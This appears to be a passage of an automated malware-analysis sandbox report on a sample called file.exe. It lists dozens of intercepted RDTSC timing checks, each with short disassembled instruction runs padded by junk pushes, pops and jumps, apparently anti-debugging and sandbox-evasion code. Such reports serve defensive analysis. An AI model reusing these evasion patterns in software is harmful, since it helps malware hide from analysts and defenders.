              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D0E950 second address: D0E956 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D0EA7D second address: D0EA9C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnl 00007F055D0637C7h 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D0EA9C second address: D0EAA6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jp 00007F055C7C8326h 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CC6B82 second address: CC6B86 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D12D38 second address: D12D5B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F055C7C8338h 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D12D5B second address: D12D5F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D12D5F second address: D12D6F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F055C7C832Ch 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D12D6F second address: D12D78 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push esi 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D12D78 second address: D12D9E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 push ecx 0x00000006 push eax 0x00000007 pop eax 0x00000008 push ecx 0x00000009 pop ecx 0x0000000a pop ecx 0x0000000b popad 0x0000000c push ecx 0x0000000d jp 00007F055C7C833Dh 0x00000013 jmp 00007F055C7C8331h 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D13299 second address: D132C8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F055D0637C2h 0x00000007 jmp 00007F055D0637C1h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e je 00007F055D0637C2h 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D15D30 second address: D15D6F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F055C7C8330h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a jmp 00007F055C7C8335h 0x0000000f pushad 0x00000010 jmp 00007F055C7C8330h 0x00000015 pushad 0x00000016 popad 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D161C9 second address: D161CD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D161CD second address: D161EF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jmp 00007F055C7C8339h 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D1BB47 second address: D1BB6C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F055D0637C5h 0x00000008 pushad 0x00000009 popad 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d push esi 0x0000000e pop esi 0x0000000f jnc 00007F055D0637B6h 0x00000015 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D1C0C6 second address: D1C0E1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 jmp 00007F055C7C8334h 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D1C0E1 second address: D1C0E6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D1C3FB second address: D1C401 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D1D2C8 second address: D1D2CC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D1D2CC second address: D1D2E6 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007F055C7C832Eh 0x0000000f pushad 0x00000010 popad 0x00000011 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D1D2E6 second address: D1D2F6 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 jne 00007F055D0637B6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D1D2F6 second address: D1D2FA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D1D2FA second address: D1D2FE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D1D2FE second address: D1D30B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push esi 0x00000008 push esi 0x00000009 push edi 0x0000000a pop edi 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D22AF8 second address: D22B07 instructions: 0x00000000 rdtsc 0x00000002 ja 00007F055D0637B6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b pushad 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D22B07 second address: D22B32 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007F055C7C8337h 0x0000000c jmp 00007F055C7C832Dh 0x00000011 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D22B32 second address: D22B36 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D2668D second address: D26691 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D259F5 second address: D259FA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D25B2C second address: D25B55 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 push esi 0x00000007 js 00007F055C7C8338h 0x0000000d jmp 00007F055C7C8332h 0x00000012 push eax 0x00000013 push edx 0x00000014 push esi 0x00000015 pop esi 0x00000016 jne 00007F055C7C8326h 0x0000001c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D25CC2 second address: D25D01 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edi 0x00000007 push esi 0x00000008 pop esi 0x00000009 pushad 0x0000000a popad 0x0000000b pop edi 0x0000000c pop esi 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 push edi 0x00000011 pop edi 0x00000012 jmp 00007F055D0637BCh 0x00000017 jne 00007F055D0637B6h 0x0000001d jmp 00007F055D0637C6h 0x00000022 popad 0x00000023 push eax 0x00000024 push edx 0x00000025 push eax 0x00000026 push edx 0x00000027 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D25D01 second address: D25D05 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D25D05 second address: D25D15 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F055D0637BCh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D25E93 second address: D25E99 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D26123 second address: D26127 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D26127 second address: D26141 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F055C7C832Ah 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jnc 00007F055C7C8326h 0x00000013 pushad 0x00000014 popad 0x00000015 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D26141 second address: D26164 instructions: 0x00000000 rdtsc 0x00000002 jng 00007F055D0637B6h 0x00000008 jmp 00007F055D0637C9h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D2F781 second address: D2F7BB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007F055C7C8339h 0x0000000e jmp 00007F055C7C8338h 0x00000013 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D2D9EA second address: D2D9F0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D2D9F0 second address: D2DA03 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 jmp 00007F055C7C832Ch 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D2DE4D second address: D2DE5D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007F055D0637BAh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D2DE5D second address: D2DE69 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 jnp 00007F055C7C8326h 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D2E68B second address: D2E695 instructions: 0x00000000 rdtsc 0x00000002 jl 00007F055D0637B6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D2EDFC second address: D2EE53 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F055C7C8331h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a ja 00007F055C7C832Eh 0x00000010 push esi 0x00000011 pop esi 0x00000012 jo 00007F055C7C8326h 0x00000018 jmp 00007F055C7C8339h 0x0000001d jmp 00007F055C7C832Ch 0x00000022 push eax 0x00000023 push edx 0x00000024 jmp 00007F055C7C832Ah 0x00000029 push edi 0x0000002a pop edi 0x0000002b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D2D465 second address: D2D469 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D2D469 second address: D2D46D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D2D46D second address: D2D494 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ebx 0x00000007 pushad 0x00000008 popad 0x00000009 pushad 0x0000000a popad 0x0000000b pop ebx 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F055D0637C9h 0x00000013 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D350E2 second address: D350E6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D350E6 second address: D350EA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D350EA second address: D35103 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jno 00007F055C7C8326h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push edi 0x0000000d jmp 00007F055C7C832Bh 0x00000012 pop edi 0x00000013 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D3524D second address: D35266 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F055D0637C5h 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D35266 second address: D3526A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D3526A second address: D35278 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop edx 0x00000009 push edi 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D35278 second address: D3527C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D38FB3 second address: D38FE7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F055D0637C3h 0x00000009 jng 00007F055D0637B6h 0x0000000f popad 0x00000010 pushad 0x00000011 push edi 0x00000012 pop edi 0x00000013 jmp 00007F055D0637C0h 0x00000018 push eax 0x00000019 pop eax 0x0000001a popad 0x0000001b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D38FE7 second address: D39017 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edx 0x00000004 pop edx 0x00000005 push edx 0x00000006 pop edx 0x00000007 jmp 00007F055C7C8333h 0x0000000c pushad 0x0000000d popad 0x0000000e popad 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007F055C7C832Fh 0x00000016 push esi 0x00000017 pop esi 0x00000018 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D46834 second address: D4683D instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ebx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D493F8 second address: D4941D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 popad 0x00000007 pushad 0x00000008 push edi 0x00000009 pop edi 0x0000000a jmp 00007F055C7C832Ah 0x0000000f jmp 00007F055C7C832Fh 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D589BC second address: D589C6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 popad 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D589C6 second address: D589CC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D5BB21 second address: D5BB27 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D5BB27 second address: D5BB2B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D5FEBF second address: D5FEEB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jl 00007F055D0637B6h 0x0000000a push eax 0x0000000b pop eax 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f pop edx 0x00000010 jmp 00007F055D0637C5h 0x00000015 pop eax 0x00000016 push eax 0x00000017 push edx 0x00000018 pushad 0x00000019 popad 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D5FEEB second address: D5FEEF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D601B8 second address: D601C5 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edi 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D601C5 second address: D601CB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D601CB second address: D601F1 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F055D0637B6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push edi 0x0000000d pop edi 0x0000000e jmp 00007F055D0637C8h 0x00000013 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D601F1 second address: D601F5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D601F5 second address: D60201 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnp 00007F055D0637B6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D60201 second address: D60209 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D60209 second address: D6020D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D65294 second address: D6529A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D6529A second address: D652A0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D652A0 second address: D652D0 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F055C7C8326h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F055C7C8339h 0x00000011 jmp 00007F055C7C832Bh 0x00000016 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D652D0 second address: D652D4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D66DB4 second address: D66DB8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D66DB8 second address: D66DBE instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D6A13E second address: D6A14A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 push esi 0x00000007 pop esi 0x00000008 popad 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D6C60F second address: D6C615 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D6C615 second address: D6C61A instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D6C61A second address: D6C620 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D7977A second address: D7977E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D7977E second address: D79782 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D79782 second address: D797A2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a jmp 00007F055C7C8336h 0x0000000f rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D7BBF6 second address: D7BBFA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D7BBFA second address: D7BC46 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push esi 0x00000009 jmp 00007F055C7C8334h 0x0000000e pop esi 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007F055C7C8334h 0x00000016 jmp 00007F055C7C8338h 0x0000001b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D7BC46 second address: D7BC4A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D7BC4A second address: D7BC65 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 popad 0x00000009 push eax 0x0000000a push edx 0x0000000b jc 00007F055C7C8328h 0x00000011 push eax 0x00000012 push edx 0x00000013 jbe 00007F055C7C8326h 0x00000019 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D7BC65 second address: D7BC6B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D73B77 second address: D73B8D instructions: 0x00000000 rdtsc 0x00000002 jo 00007F055C7C832Ch 0x00000008 jns 00007F055C7C8326h 0x0000000e ja 00007F055C7C832Eh 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D8884E second address: D88867 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 jmp 00007F055D0637C0h 0x0000000e rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D88867 second address: D8886B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D8886B second address: D888AF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 pushad 0x00000008 jne 00007F055D0637CFh 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 pop eax 0x00000012 jmp 00007F055D0637C9h 0x00000017 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D888AF second address: D888D0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F055C7C832Fh 0x00000007 jne 00007F055C7C8326h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 push edx 0x00000011 jc 00007F055C7C8326h 0x00000017 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D8B690 second address: D8B696 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D8B696 second address: D8B6C1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F055C7C832Ch 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007F055C7C8339h 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D9FA43 second address: D9FA59 instructions: 0x00000000 rdtsc 0x00000002 jo 00007F055D0637B6h 0x00000008 jnl 00007F055D0637B6h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 popad 0x00000014 push edi 0x00000015 pop edi 0x00000016 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D9FA59 second address: D9FA5D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D9FEA2 second address: D9FEA6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D9FEA6 second address: D9FEAA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
